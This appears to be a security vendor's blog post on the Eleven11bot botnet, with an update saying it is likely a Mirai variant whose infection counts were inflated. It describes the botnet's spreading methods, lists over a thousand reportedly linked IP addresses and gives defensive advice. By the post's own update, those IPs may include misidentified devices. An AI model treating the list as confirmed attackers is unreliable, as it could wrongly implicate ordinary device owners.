Threat Signals

Update (5 March 2025): Key Clarifications on Eleven11bot

Further analysis has refined the understanding of the scale and nature of Eleven11bot. Key clarifications:

Likely a Mirai Variant

• Eleven11bot is likely not a distinct botnet, but rather a Mirai variant using a single new exploit targeting HiSilicon-based devices, particularly those running TVT-NVMS9000 software.

Overestimated Infection Numbers

• While reports estimated 86,400 infections globally, the actual number of compromised devices is likely fewer than 5,000.

Misidentified Tracking Signature

• The "head[...]1111" signature, initially associated with Eleven11bot, is not malware-related but rather part of the HiSilicon SDK protocol used for remote management across white-labeled devices.

Faulty Detection Method Inflated Infection Estimates

• The reported 86K+ infections appear to be based on a misidentification of normal HiSilicon device protocol traffic as botnet activity.

‍

How GreyNoise Identified This Activity

GreyNoise analyzed a list of 1,400 IPs provided by Censys, identifying 1,042 of them engaging in scanning and exploitation attempts. These were primarily embedded systems that typically do not initiate outbound internet communication, reinforcing their likely compromise.

While initial infection estimates were high, the activity observed in GreyNoise suggests that a subset of these devices are actively participating in Mirai-related behavior. Because these IPs are unlikely to change dynamically (e.g., through DHCP), they may continue to be involved in future Mirai botnet activity.

‍

GreyNoise is developing an enhanced dynamic IP blocklist to help defenders take faster action on emerging threats. Click here to learn more or get on the waitlist.

‍

‍

A newly discovered global cyber threat is rapidly expanding, infecting tens of thousands of internet-connected devices to launch powerful cyberattacks. Nokia Deepfield’s Emergency Response Team (ERT) has identified a new botnet, tracked as Eleven11bot, which they estimated has compromised over 30,000 devices, primarily security cameras and network video recorders (NVRs). 

According to DeepField, Eleven11bot has been used in distributed denial of service (DDoS) attacks against telecom providers and gaming platforms, with some attacks lasting multiple days and causing widespread disruptions. Jérôme Meyer, a security researcher tracking the botnet, described it as “one of the largest known DDoS botnet campaigns observed since the invasion of Ukraine in February 2022.” 

‍

GreyNoise Observations on Eleven11bot

Following Deepfield’s findings, Censys provided GreyNoise with a list of 1,400 IPs that appear to be linked to Eleven11bot due to the configuration of the endpoint devices and the banners matching what Deepfield identified in their research. GreyNoise has observed 1,042 IPs actively hitting our sensors in the past 30 days. 

‍

‍

Key findings from our data:

• 96% of these IPs are non-spoofable, meaning they originate from genuine, accessible devices. 
• 61% of the 1,042 observed IPs (636) are traced to Iran. 
• 305 IPs are currently classified as malicious by GreyNoise.

While GreyNoise does not speculate on attribution, this increase in botnet activity comes just two days after the U.S. administration reasserted its “maximum pressure” campaign on Iran, imposing new economic sanctions. 

‍

How the Botnet is Expanding

GreyNoise data indicates that the botnet is involved in malicious activities. Observations from GreyNoise show that the botnet is engaging in actions presumably aimed at expanding its operations, including:

• Brute-force attacks against login systems.
• Exploitation of weak and default passwords on IoT devices.
• Targeting specific security camera brands, such as VStarcam, using hardcoded credentials. 
• Network scanning for exposed Telnet and SSH ports is often left unprotected on IoT hardware.

GreyNoise has identified 305 IP addresses actively carrying out malicious attacks linked to the botnet. 

‍

How to See the Botnet in Action

SOC teams, vulnerability management professionals, and threat hunters can track the botnet’s live activity using GreyNoise:

1. Navigate to the Analysis feature.
2. Paste the list of botnet IPs (source: Censys) into the search bar. 
3. Download the CSV of malicious IPs to take immediate blocking actions.

‍

Censys-Provided IP List

A list of IPs associated with this botnet is available below: 

189.146.95.172, 109.177.122.31, 89.138.147.184, 151.235.34.214, 5.236.26.32, 219.68.208.58, 188.136.145.85, 188.0.252.252, 85.185.86.123, 85.64.144.30, 37.209.250.184, 46.100.167.242, 187.222.16.246, 93.117.22.12, 201.103.21.250, 49.49.196.236, 85.204.92.18, 5.235.246.3, 188.208.56.221, 85.65.233.119, 92.246.144.41, 89.44.129.106, 121.121.120.83, 187.140.192.47, 2.177.119.45, 85.204.208.71, 212.33.220.19, 94.248.157.238, 118.100.14.226, 1.34.208.234, 185.143.205.205, 187.145.119.33, 94.236.212.196, 2.183.103.157, 184.82.165.29, 140.228.114.78, 151.235.209.217, 181.91.50.105, 5.232.132.134, 94.69.204.29, 151.235.218.159, 89.44.178.47, 5.239.203.128, 96.56.153.66, 5.236.31.85, 201.124.214.125, 223.197.242.106, 129.122.190.112, 5.237.218.185, 47.40.192.65, 31.46.51.89, 31.25.135.70, 92.16.149.88, 93.117.25.45, 2.181.122.131, 5.236.4.240, 188.136.145.211, 212.230.233.242, 79.129.204.249, 186.179.190.223, 2.177.94.45, 151.232.164.183, 2.180.168.37, 109.125.132.22, 37.255.231.24, 5.239.201.165, 178.238.205.215, 93.117.4.125, 5.237.211.203, 85.204.91.53, 185.161.39.100, 37.255.202.86, 91.215.63.71, 2.185.147.45, 80.44.4.218, 188.208.62.96, 103.16.202.12, 201.110.173.252, 46.167.130.169, 94.236.208.50, 89.144.164.205, 5.236.5.8, 5.239.201.208, 2.181.125.1, 151.235.251.145, 66.79.103.47, 111.70.42.18, 175.182.30.205, 195.181.92.230, 2.181.122.167, 2.187.30.159, 151.235.225.234, 185.179.170.128, 45.64.9.50, 2.183.92.21, 5.239.194.245, 5.235.255.11, 114.79.139.86, 103.213.2.195, 51.148.68.216, 2.183.85.111, 103.168.95.100, 37.148.26.127, 123.252.30.158, 189.111.108.196, 189.130.110.67, 195.181.89.153, 213.170.113.103, 85.105.224.110, 85.75.90.215, 121.123.48.140, 95.76.175.162, 91.92.238.206, 151.235.246.135, 178.238.205.7, 2.189.32.234, 5.232.208.113, 78.38.50.13, 151.235.165.4, 2.183.103.167, 94.183.34.57, 151.235.222.49, 89.34.176.50, 37.255.229.225, 75.176.59.51, 151.247.255.155, 5.237.245.216, 151.235.171.145, 185.99.213.108, 93.117.24.248, 2.183.84.97, 121.122.76.121, 85.204.81.30, 212.33.216.93, 119.63.252.244, 177.82.53.144, 5.235.229.227, 89.144.181.119, 151.235.190.139, 151.247.176.26, 2.180.66.200, 151.247.255.247, 187.131.55.220, 93.118.132.89, 93.117.21.63, 201.17.188.158, 185.155.15.213, 94.183.167.204, 201.138.15.112, 37.6.224.129, 188.136.147.176, 195.181.88.185, 85.204.209.154, 89.44.134.251, 94.183.49.104, 46.167.147.56, 5.235.245.163, 2.189.220.6, 2.181.117.54, 151.235.251.24, 212.33.214.217, 151.235.199.20, 80.178.101.235, 189.147.165.51, 220.134.49.77, 5.239.194.91, 195.181.95.232, 89.132.5.70, 92.26.231.102, 121.121.217.80, 121.121.138.216, 151.235.203.13, 89.144.185.223, 151.235.237.239, 106.1.144.120, 63.143.94.171, 159.192.253.252, 68.237.32.174, 151.235.215.52, 142.189.195.120, 151.247.177.116, 121.121.185.142, 217.24.158.182, 2.180.61.219, 89.44.134.113, 89.144.177.1, 5.235.241.26, 77.127.1.199, 2.182.205.80, 2.183.86.125, 93.117.9.179, 93.173.99.106, 201.138.108.135, 151.235.185.112, 82.137.225.93, 5.232.25.254, 5.239.211.129, 89.151.143.129, 94.183.71.123, 66.79.101.150, 2.180.200.177, 2.183.117.7, 41.75.110.81, 5.237.209.186, 31.215.79.124, 89.44.132.159, 178.238.205.171, 217.24.144.115, 45.80.100.91, 141.149.50.170, 2.180.153.175, 195.181.88.149, 185.145.9.81, 46.100.165.9, 85.204.82.198, 5.235.201.75, 109.125.137.19, 85.185.223.52, 118.67.38.71, 46.100.63.67, 151.235.195.235, 89.44.177.151, 220.132.212.32, 189.133.6.176, 5.239.214.253, 2.85.193.200, 2.183.99.153, 5.235.244.117, 47.18.219.178, 2.188.249.61, 85.204.212.250, 79.131.53.200, 46.100.71.145, 222.154.255.94, 93.117.19.101, 187.131.11.211, 2.187.21.254, 151.235.235.44, 85.204.216.11, 201.124.11.143, 85.204.212.173, 5.236.4.37, 5.236.26.159, 2.181.165.22, 86.122.111.157, 78.38.49.93, 80.210.22.1, 218.210.35.204, 151.235.183.146, 151.235.249.130, 37.156.8.153, 121.121.194.43, 5.235.254.98, 5.236.26.135, 188.0.248.66, 211.51.2.142, 49.205.214.42, 93.117.1.16, 151.235.248.13, 5.235.253.190, 94.183.66.171, 187.236.0.124, 2.181.174.246, 185.145.9.91, 2.183.89.62, 189.146.49.218, 212.33.215.219, 2.179.178.61, 45.227.182.70, 187.202.253.3, 212.33.221.178, 88.227.24.153, 93.173.82.201, 124.120.109.25, 5.232.215.149, 91.81.250.29, 91.140.9.194, 2.180.128.35, 185.153.19.82, 81.213.125.57, 85.204.216.82, 96.246.97.171, 207.68.254.110, 5.239.205.61, 217.172.112.173, 5.239.211.57, 2.84.151.60, 86.101.165.44, 110.78.152.13, 179.233.2.126, 223.205.106.141, 5.235.254.226, 94.183.223.246, 2.183.82.177, 151.235.224.111, 185.214.38.245, 177.32.50.202, 93.117.30.74, 91.138.231.182, 80.41.187.85, 195.181.92.73, 42.200.101.249, 94.183.39.190, 46.167.139.58, 151.235.215.166, 213.14.135.196, 2.180.227.174, 213.255.192.133, 62.38.192.91, 5.235.252.173, 5.26.198.252, 162.247.30.77, 78.186.137.34, 37.255.240.146, 85.204.222.227, 5.236.3.21, 93.117.18.132, 93.117.21.38, 195.181.88.44, 89.44.178.187, 49.158.178.14, 180.75.76.186, 188.136.146.183, 2.187.28.140, 5.236.27.49, 85.204.92.157, 201.111.57.181, 5.235.200.231, 188.136.145.156, 68.114.79.238, 190.70.203.65, 2.181.181.162, 89.44.177.52, 187.189.119.70, 14.192.239.183, 89.44.180.82, 93.117.5.58, 1.34.190.33, 46.167.142.60, 110.78.143.218, 119.203.80.160, 187.153.251.86, 151.235.237.248, 151.235.193.90, 123.205.137.2, 67.248.45.251, 195.181.84.56, 46.117.201.231, 109.122.236.65, 5.235.224.94, 95.9.243.32, 5.237.200.221, 94.52.221.36, 142.190.101.154, 5.237.218.129, 46.167.128.78, 5.235.247.46, 2.183.81.97, 2.180.115.134, 2.180.48.78, 189.226.255.168, 58.136.192.226, 189.144.217.55, 5.235.200.240, 93.69.92.102, 93.117.24.86, 120.151.233.95, 86.16.32.174, 217.219.132.8, 69.114.91.81, 5.235.205.108, 5.232.6.185, 217.24.149.149, 79.12.134.200, 155.93.138.70, 189.164.69.177, 73.155.56.206, 93.117.15.45, 186.22.8.134, 2.180.120.161, 85.130.151.235, 175.139.19.110, 151.235.250.51, 187.228.70.80, 201.137.43.131, 177.130.45.117, 89.44.135.156, 217.24.151.249, 151.235.191.176, 151.235.173.15, 175.136.64.28, 5.238.149.232, 5.235.224.121, 2.180.209.135, 122.118.49.210, 217.172.113.244, 85.185.21.106, 1.34.19.189, 85.204.221.45, 177.243.176.6, 151.235.196.18, 31.25.130.35, 188.136.145.134, 66.79.101.50, 217.24.154.7, 1.34.103.28, 201.103.44.104, 39.52.9.123, 5.235.192.12, 151.235.209.39, 103.21.223.123, 5.239.195.94, 85.130.174.180, 188.0.251.172, 31.120.75.59, 58.136.145.71, 5.239.199.51, 195.181.81.190, 175.145.228.109, 121.123.81.221, 2.183.104.53, 110.78.141.81, 24.47.40.46, 31.171.223.253, 2.177.57.197, 93.67.124.116, 189.190.82.24, 71.71.129.146, 121.121.184.196, 2.183.86.140, 85.130.237.70, 151.235.251.125, 5.237.224.16, 68.132.85.87, 2.183.102.202, 2.183.84.147, 76.30.30.53, 216.158.152.171, 2.180.167.109, 2.179.74.143, 189.130.182.115, 93.117.7.9, 37.255.200.202, 2.177.160.228, 217.24.149.39, 46.167.149.243, 187.170.118.148, 85.204.220.227, 2.187.8.244, 93.117.20.253, 151.239.92.236, 46.100.61.124, 66.79.98.48, 151.235.199.42, 85.204.92.166, 80.191.189.91, 72.80.79.252, 89.243.14.23, 109.122.228.133, 5.237.245.37, 184.178.59.222, 2.183.119.159, 85.204.83.117, 201.123.134.124, 187.234.229.230, 2.180.56.252, 131.100.136.93, 2.179.167.151, 151.235.182.64, 5.239.206.19, 5.237.243.159, 203.73.166.3, 189.223.218.108, 37.255.197.113, 2.183.103.77, 195.181.90.120, 95.5.11.129, 151.235.183.69, 95.80.169.14, 189.251.16.220, 187.235.152.211, 79.130.180.251, 78.188.109.187, 109.110.130.251, 177.94.244.81, 77.49.205.38, 5.237.225.225, 103.217.134.123, 2.189.17.59, 80.252.51.71, 2.177.58.228, 93.117.30.209, 151.235.187.184, 189.131.146.104, 84.42.41.2, 5.237.211.166, 79.129.48.124, 189.146.209.177, 151.235.240.75, 2.180.113.51, 5.235.220.196, 2.183.103.180, 114.33.109.103, 110.77.170.51, 85.204.214.71, 94.183.108.176, 94.183.152.218, 85.15.44.159, 189.164.38.239, 2.182.209.245, 67.242.148.242, 171.6.97.135, 195.181.39.41, 98.0.212.169, 94.66.106.97, 5.236.27.28, 188.208.57.217, 5.239.204.228, 2.187.8.64, 59.120.97.125, 23.243.134.140, 151.247.208.75, 93.117.24.75, 109.186.33.241, 93.118.97.114, 195.181.93.58, 195.181.83.209, 79.129.169.250, 86.105.196.226, 189.223.229.214, 187.147.245.234, 217.24.151.88, 2.187.9.162, 5.239.202.12, 84.241.0.19, 93.117.15.208, 219.92.33.224, 2.181.164.16, 93.119.95.2, 2.189.32.169, 95.38.24.35, 168.210.206.226, 93.117.11.255, 5.235.224.145, 189.222.221.227, 2.182.204.206, 203.106.189.215, 218.35.170.14, 51.194.49.200, 85.204.91.192, 5.235.239.145, 178.238.205.244, 109.122.231.77, 5.235.195.149, 189.238.78.99, 5.232.147.159, 5.236.27.100, 78.188.91.209, 94.183.165.81, 49.205.178.192, 2.178.108.180, 188.0.250.116, 5.235.251.230, 91.138.228.157, 188.211.204.134, 188.208.58.177, 5.232.123.11, 2.183.86.177, 87.203.214.185, 70.119.153.165, 217.24.158.32, 185.143.205.198, 151.235.206.231, 212.50.187.72, 219.95.75.69, 85.204.90.28, 181.164.73.16, 217.24.149.253, 189.234.249.162, 60.248.49.68, 5.235.246.82, 5.237.242.162, 187.104.138.93, 85.96.205.145, 89.44.135.176, 5.235.237.14, 37.255.210.207, 216.232.6.27, 93.117.18.15, 189.149.95.6, 89.44.129.32, 188.208.63.235, 1.10.255.254, 2.180.112.180, 94.183.187.127, 178.238.205.188, 219.95.76.180, 175.139.73.202, 76.171.86.84, 41.38.151.102, 121.121.114.108, 187.250.45.91, 151.235.183.211, 78.182.13.6, 5.235.112.248, 85.204.93.87, 46.117.134.28, 217.24.152.228, 2.182.204.88, 5.238.239.127, 5.236.93.20, 93.117.28.92, 123.252.63.8, 2.181.123.33, 31.130.186.229, 94.183.121.207, 177.128.21.82, 212.33.214.210, 5.232.149.229, 151.235.249.162, 5.232.148.106, 93.117.1.99, 37.26.33.239, 85.185.23.81, 14.43.138.61, 111.95.173.139, 46.100.60.41, 5.235.231.230, 89.144.181.125, 2.183.83.95, 151.235.38.33, 5.235.193.27, 37.255.228.49, 46.65.212.7, 183.82.114.10, 159.250.32.219, 94.21.67.157, 5.237.227.252, 178.238.204.238, 35.129.112.115, 188.0.255.34, 159.192.112.133, 2.180.112.125, 151.235.247.197, 212.56.152.72, 5.80.48.238, 2.180.130.55, 185.129.239.186, 5.29.135.63, 46.167.158.137, 74.141.247.68, 72.252.155.77, 151.235.199.189, 189.165.255.1, 151.235.201.10, 93.117.29.181, 79.130.195.166, 151.235.32.249, 188.208.60.42, 189.129.154.117, 195.181.84.72, 5.239.9.236, 159.20.101.73, 85.204.223.66, 2.183.116.135, 195.181.80.60, 122.117.232.247, 5.235.188.153, 88.214.8.82, 93.69.95.145, 93.117.18.204, 5.237.245.34, 93.117.17.94, 93.117.23.199, 2.184.54.148, 189.133.90.196, 2.183.84.226, 2.187.9.19, 217.119.134.247, 5.237.198.211, 2.183.108.192, 94.183.22.231, 195.181.85.175, 72.89.228.221, 76.91.240.41, 115.133.40.94, 2.182.204.203, 151.235.184.46, 2.187.26.4, 94.183.34.86, 151.235.222.195, 2.189.16.32, 89.139.22.16, 187.194.13.216, 89.44.177.203, 72.226.55.118, 182.53.50.7, 109.122.228.83, 5.237.196.153, 2.181.171.176, 2.182.210.187, 2.180.233.57, 5.160.164.157, 85.204.94.54, 93.117.27.212, 189.136.228.166, 89.139.50.53, 93.117.6.114, 181.188.89.136, 39.61.142.37, 195.181.91.79, 188.152.71.244, 151.235.205.206, 73.166.225.156, 88.247.58.129, 5.239.195.231, 5.239.204.48, 188.208.61.152, 2.180.182.232, 2.183.83.58, 182.18.254.74, 188.136.134.40, 93.117.28.135, 189.144.150.208, 2.181.180.194, 5.235.188.131, 217.24.148.254, 85.204.89.202, 151.235.205.254, 2.183.88.135, 187.154.193.97, 93.117.9.189, 2.183.101.128, 85.185.222.126, 151.235.182.175, 188.125.133.68, 105.184.84.151, 93.117.11.231, 85.204.211.4, 217.24.144.179, 85.204.87.184, 2.183.103.205, 177.11.198.142, 5.235.213.64, 151.235.251.107, 5.202.130.176, 2.187.11.222, 61.221.204.130, 87.70.72.26, 66.79.102.2, 141.237.201.205, 2.183.92.19, 114.34.70.104, 151.235.170.230, 5.235.236.126, 5.239.201.116, 195.181.82.66, 85.204.211.240, 2.187.23.176, 5.235.255.99, 91.92.239.53, 74.62.19.2, 5.237.221.66, 151.235.242.250, 151.235.193.214, 217.24.152.220, 187.250.51.93, 89.144.181.147, 71.87.234.14, 189.60.254.220, 121.122.103.7, 2.179.166.242, 68.193.40.235, 94.183.137.181, 195.181.85.67, 151.235.4.177, 120.158.143.49, 2.179.65.208, 2.180.125.74, 82.81.33.192, 151.247.253.126, 2.183.82.51, 95.212.144.172, 189.151.199.249, 59.126.81.229, 24.189.118.45, 99.217.21.63, 217.24.152.64, 89.41.42.145, 88.247.3.244, 94.192.45.51, 2.191.22.175, 78.38.124.97, 2.189.158.98, 2.179.65.167, 80.191.13.230, 217.180.231.219, 151.235.247.155, 212.33.219.110, 5.175.151.103, 85.204.213.152, 73.19.30.201, 187.226.51.72, 171.4.1.158, 5.237.196.108, 94.183.169.64, 92.249.235.62, 2.189.16.98, 58.136.221.25, 5.235.190.102, 103.239.251.223, 2.180.198.137, 85.204.216.61, 5.235.197.52, 85.204.88.42, 84.241.11.121, 60.49.64.12, 184.82.211.44, 95.38.144.106, 93.118.104.232, 5.236.29.201, 151.235.190.49, 175.145.96.123, 149.106.153.111, 93.117.19.218, 187.199.123.56, 178.164.145.153, 183.89.196.233, 24.193.72.244, 210.186.19.215, 188.0.253.216, 5.232.208.195, 5.160.160.237, 121.122.89.29, 118.163.126.240, 2.176.110.80, 2.187.9.147, 39.38.140.158, 93.117.26.79, 93.117.2.114, 95.6.66.197, 46.100.170.220, 165.255.49.16, 149.100.174.16, 185.170.236.138, 2.183.120.150, 172.114.252.162, 5.235.218.39, 2.180.90.95, 2.183.105.236, 95.77.150.198, 189.131.172.161, 201.103.87.55, 185.143.205.169, 5.160.164.190, 5.202.243.183, 5.239.205.155, 217.24.159.181, 5.198.232.224, 188.208.60.80, 180.75.9.47, 5.235.241.96, 201.106.100.165, 5.239.214.5, 67.81.227.18, 5.239.195.191, 5.235.247.184, 5.237.198.49, 93.117.21.125, 89.44.182.23, 177.193.59.18, 188.0.255.13, 151.235.180.152, 151.235.245.195, 88.248.19.4, 150.129.144.141, 91.92.238.223, 188.0.249.188, 59.126.116.185, 85.75.64.133, 185.11.69.162, 178.252.142.190, 85.185.23.45, 85.204.222.76, 187.195.64.11, 93.118.96.117, 2.183.85.115, 212.33.217.6, 188.0.252.15, 151.205.164.197, 2.180.132.190, 2.180.93.85, 212.33.222.199, 2.181.175.157, 5.235.245.125, 151.235.240.13, 85.204.223.125, 182.235.184.57, 151.235.231.223, 89.144.177.4, 182.53.238.86, 185.147.40.132, 151.235.32.60, 85.204.219.152, 2.189.17.148, 200.74.91.155, 2.183.105.184, 5.232.129.134, 221.166.171.189, 176.12.64.65, 195.181.90.168, 2.183.87.222, 93.117.21.139, 2.181.247.128, 5.236.13.168, 2.181.120.208, 5.190.253.247, 85.204.90.242, 2.187.8.145, 2.180.106.81, 2.183.82.141, 5.239.192.50, 187.250.70.157, 2.183.118.51, 85.204.87.208, 187.211.77.132, 2.180.252.8, 217.24.158.130, 89.138.140.44, 212.33.221.97, 5.239.177.164, 78.187.37.146, 188.0.252.49, 151.235.240.41, 46.6.15.156, 119.42.71.249, 5.160.164.177, 171.5.117.144, 2.176.12.95, 151.235.181.0, 178.248.203.165, 121.121.122.140, 94.183.151.242, 5.239.192.112, 2.183.110.56, 2.183.119.252, 220.133.105.205, 2.183.121.254, 14.192.239.250, 35.141.220.32, 151.235.215.103, 5.232.8.156, 5.232.140.10, 2.183.95.77, 189.102.4.119, 2.180.180.49, 151.235.161.213, 2.183.89.173, 187.235.101.174, 93.117.11.116, 94.183.235.37, 150.129.144.144, 110.77.170.232, 5.236.26.193, 96.246.230.97, 185.82.167.140, 93.117.30.230, 5.237.227.23, 217.24.155.60, 188.208.60.114, 2.180.91.177, 217.24.156.21, 187.195.104.61, 189.226.172.99, 93.117.8.229, 2.183.103.48, 93.117.26.123, 5.237.238.167, 14.137.65.139, 176.66.117.117, 2.187.29.119, 189.225.58.80, 37.156.24.141, 189.222.54.234, 217.24.154.169, 212.33.217.203, 2.180.233.54, 175.142.46.139, 201.137.105.24, 187.195.66.122, 2.183.95.126, 151.235.197.243, 2.191.20.163, 5.235.192.85, 88.228.151.17, 94.183.37.23, 212.33.220.113, 2.180.205.91, 89.144.171.3, 188.136.146.28, 84.241.43.45, 2.180.17.65, 85.204.212.174, 111.248.15.189, 213.191.186.66, 58.136.106.47, 5.235.249.92, 2.187.29.157, 201.123.230.175, 37.148.74.5, 31.14.209.135, 151.235.171.255, 217.24.144.246, 208.80.139.41, 2.187.29.105, 201.124.125.87, 2.177.147.234, 5.235.226.137, 2.176.138.214, 60.48.51.21, 5.232.26.41, 88.250.67.183, 2.179.189.80, 2.183.111.129, 5.237.208.231, 68.192.201.223, 2.185.209.42, 109.186.73.105, 187.145.163.235, 178.238.204.98, 89.144.178.54, 189.241.206.39, 85.204.222.133, 201.110.155.87, 2.185.150.143, 2.181.78.175, 187.145.174.214, 2.181.34.17, 189.146.101.63, 94.183.223.172, 2.183.112.141, 114.34.229.150, 121.123.189.11, 72.12.173.190, 2.177.91.98, 5.160.164.169, 151.235.202.107, 175.144.158.57, 115.135.43.140, 210.186.17.196, 185.75.204.0, 2.186.115.59, 91.92.121.171, 108.185.72.100, 94.183.158.220, 195.181.81.154, 5.235.230.127, 151.235.241.21, 31.204.239.127, 94.183.195.49, 181.91.50.241, 195.228.99.217, 121.122.90.43, 118.170.40.214, 85.64.142.148, 93.117.17.102, 2.182.206.251, 151.235.230.111, 5.239.213.73, 170.0.18.244, 71.93.3.7, 217.24.152.236, 2.178.103.79, 46.167.145.103, 151.235.235.134, 83.235.179.174, 2.183.108.227, 66.79.100.26, 89.44.130.122, 85.185.237.214, 114.35.64.31, 93.117.5.40, 195.181.86.117, 2.183.83.85, 85.204.81.0, 217.24.147.195, 188.0.250.133, 187.73.28.29, 2.187.20.145, 85.204.93.20, 151.235.212.180, 5.237.210.87, 2.181.180.156, 187.194.201.193, 200.150.163.194, 186.179.223.20, 201.121.6.112, 2.182.212.9, 151.235.205.88, 2.180.72.49, 213.57.249.148, 88.232.160.120, 195.181.86.95, 5.235.218.172, 108.5.110.97, 189.235.70.129, 217.172.113.32, 103.69.29.170, 213.165.184.131, 5.202.243.65, 94.183.33.217, 61.2.105.70, 123.195.179.167, 189.132.111.39, 2.187.20.77, 2.180.153.163, 178.36.96.217, 89.44.130.45, 151.235.188.92, 5.236.31.104, 5.232.213.61, 105.246.14.119, 94.65.248.215, 94.183.223.153, 67.84.124.42, 78.189.28.7, 2.187.22.106, 78.187.87.138, 195.181.83.210, 210.186.107.47, 174.166.16.176, 5.235.252.8, 27.72.113.179, 89.44.134.104, 95.81.97.59, 184.82.116.10, 93.117.23.12, 61.223.78.139, 2.179.177.19, 118.232.89.51, 43.240.7.122, 85.204.89.254, 217.24.159.111, 93.172.163.102, 94.183.115.88, 79.10.140.140, 5.237.227.161, 207.254.166.51, 36.233.54.118, 94.64.157.103, 184.82.186.156, 5.232.159.199, 5.235.193.73, 109.120.219.165, 5.235.112.60, 189.146.195.2, 217.24.145.208, 78.189.224.232, 175.139.56.231, 45.226.133.169, 94.53.135.14, 2.181.165.217, 80.191.189.159, 5.235.205.222, 185.143.205.76, 5.237.242.155, 151.235.212.152, 46.167.151.49, 85.105.113.212, 5.235.240.129, 2.183.86.113, 92.25.135.138, 185.218.200.27, 200.18.125.134, 159.20.106.121, 1.161.150.91, 185.166.229.157, 2.183.91.152, 94.183.217.152, 188.0.249.156, 121.122.118.70, 5.239.211.111, 49.48.130.16, 37.148.62.216, 173.49.75.75, 108.35.94.159, 96.74.21.214, 80.11.129.246, 212.120.199.220, 151.247.210.28, 217.24.159.197, 103.16.46.227, 189.236.14.228, 2.177.173.184, 2.181.112.215, 151.239.94.216, 189.133.36.154, 1.34.203.141, 171.4.83.120, 2.183.108.128, 89.132.6.94, 151.235.232.7, 24.171.213.14, 37.255.244.105, 89.240.115.67, 5.239.202.126, 185.124.159.76, 184.82.144.171, 36.227.89.44, 106.1.5.195, 104.173.137.198, 110.78.152.154, 85.74.6.79, 2.183.80.10, 37.6.217.0, 134.236.115.108, 151.235.221.135, 5.235.188.57, 89.231.35.33, 2.183.118.226, 2.190.132.169, 151.235.253.83, 122.116.133.57, 24.169.5.172, 50.113.46.209, 2.183.101.176, 60.53.224.111, 5.232.10.201, 188.208.59.162, 201.121.169.133, 2.183.123.130, 195.181.84.247, 5.29.140.145, 180.75.5.202, 5.235.189.44, 196.50.194.85, 2.180.13.47, 5.235.239.230, 5.237.242.173, 185.153.208.104, 85.204.91.215, 108.184.9.187, 85.105.116.37, 89.139.36.0, 2.177.229.120, 2.177.202.114, 67.81.205.204, 179.62.127.73, 59.15.150.137, 100.2.171.189, 5.236.24.103, 46.167.147.144, 46.100.71.220, 151.235.175.122, 93.117.12.64, 5.232.24.211, 2.189.220.98, 151.233.48.234, 2.181.120.193, 37.148.16.232, 60.50.2.228, 86.124.75.141, 47.181.47.106, 5.235.234.174, 151.235.208.114, 2.183.87.75, 93.117.14.163, 72.43.148.85, 151.235.236.156, 2.180.126.254, 5.237.244.13, 151.235.223.61, 187.168.133.119, 2.189.220.254, 93.117.0.21, 151.233.53.26, 184.22.130.239, 137.119.111.130, 186.218.123.202, 178.131.8.104, 121.141.164.171, 159.20.96.195, 93.117.8.92, 5.237.213.108, 2.183.111.160, 89.44.176.167, 94.183.116.28, 5.235.246.35, 2.180.235.99, 37.148.29.41, 49.204.124.148, 5.235.193.254, 86.181.168.97, 95.45.93.241, 85.185.223.121, 151.235.186.114, 5.204.37.113, 46.100.69.183, 2.180.74.223, 220.132.162.224, 195.181.81.52, 223.206.121.91, 115.132.5.52, 37.148.14.254, 173.3.133.68, 91.92.183.238, 187.234.68.66, 39.52.36.253, 66.79.98.39, 2.180.122.103, 211.250.18.251, 45.59.58.192, 219.89.205.132, 93.173.111.134, 85.204.93.48, 5.237.213.70, 93.117.14.194, 89.144.189.185, 5.235.250.211, 2.187.33.36, 5.235.242.118, 66.79.102.171, 80.210.31.150, 85.204.88.118, 2.183.87.46, 111.243.142.54, 185.75.204.181, 93.172.26.242, 5.239.207.190, 217.24.148.61, 151.235.205.52, 2.183.106.212, 2.180.103.67, 5.235.251.64, 2.180.84.176, 5.58.31.53, 80.210.57.45, 201.138.164.225, 187.155.29.83, 5.235.243.106, 213.149.184.35, 189.136.41.104, 84.241.63.126, 85.185.21.156, 46.176.58.132, 85.204.222.105, 217.119.134.178, 5.236.7.208, 201.121.133.204, 2.183.105.2, 5.232.21.31, 151.235.243.112, 185.82.166.192, 188.116.226.138, 217.24.159.236, 5.232.212.143, 2.180.249.69, 2.180.224.168, 195.181.89.241, 76.175.230.13, 180.176.42.219, 103.225.138.3, 88.248.253.99, 2.189.18.57, 89.44.135.126, 79.129.161.175, 175.137.10.255, 46.100.165.75, 46.100.60.154, 221.156.100.230, 5.235.202.13, 104.33.88.36, 151.235.221.167, 2.183.107.153, 188.208.62.67, 189.251.6.24, 2.238.193.71, 5.235.195.173, 5.237.239.111, 151.235.211.29, 5.236.25.129, 151.235.165.137, 2.183.99.231, 189.235.184.238, 5.239.202.33, 189.238.38.8, 93.117.25.34, 89.144.179.31, 217.218.249.223, 93.117.24.204, 5.235.253.209, 2.180.103.138, 101.108.154.28, 14.192.239.152, 5.239.176.110, 85.204.85.232, 85.204.92.109, 46.100.71.4, 93.117.18.0, 121.122.114.229, 159.192.253.205, 98.148.153.127, 2.233.120.114, 5.235.197.156, 151.235.229.11, 223.205.103.58, 189.157.233.22, 78.188.231.62, 195.181.88.14, 187.233.187.246, 93.117.1.41, 2.181.112.50, 217.24.148.23, 5.237.206.192, 217.24.150.38, 2.187.21.52, 212.33.219.157, 85.204.95.4, 93.117.14.3, 105.242.109.188, 5.160.164.26, 195.74.245.44, 85.204.91.140, 119.42.115.88, 151.235.167.7, 197.87.218.4, 2.183.120.111, 185.176.33.41, 2.178.97.29, 91.138.234.26, 184.82.115.240, 79.127.2.188, 112.169.68.208, 78.38.41.244, 151.235.192.159, 5.202.84.19, 209.131.253.45, 2.181.127.121, 108.170.68.134, 5.239.211.210, 93.117.13.29,

‍

How Organizations Can Defend Themselves 

GreyNoise recommends the following steps to protect against the botnet and similar cyber threats: 

• Block traffic from known malicious IPs. GreyNoise provides real-time data for defenders to block threats proactively. 
• Monitor network logs for unusual login attempts. Attackers are brute-forcing weak Telnet and SSH credentials. 
• Secure IoT devices immediately. Change default passwords, update firmware, and disable remote access where unnecessary. 
• Enable DDoS protection and rate-limiting. The botnet is designed for high-intensity attacks, so organizations should harden their network defenses.

‍

GreyNoise is Actively Monitoring Eleven11bot-Linked Activity

GreyNoise continues to track real-time scanning and attack activity from the botnet. We will provide further updates if new information arises. 

Track the botnet in real time — see if your network is a target. Navigate to the GreyNoise Analysis feature, paste the IPs above into the search bar, and download the CSV of malicious IPs for immediate blocking actions. 

‍

— — — 

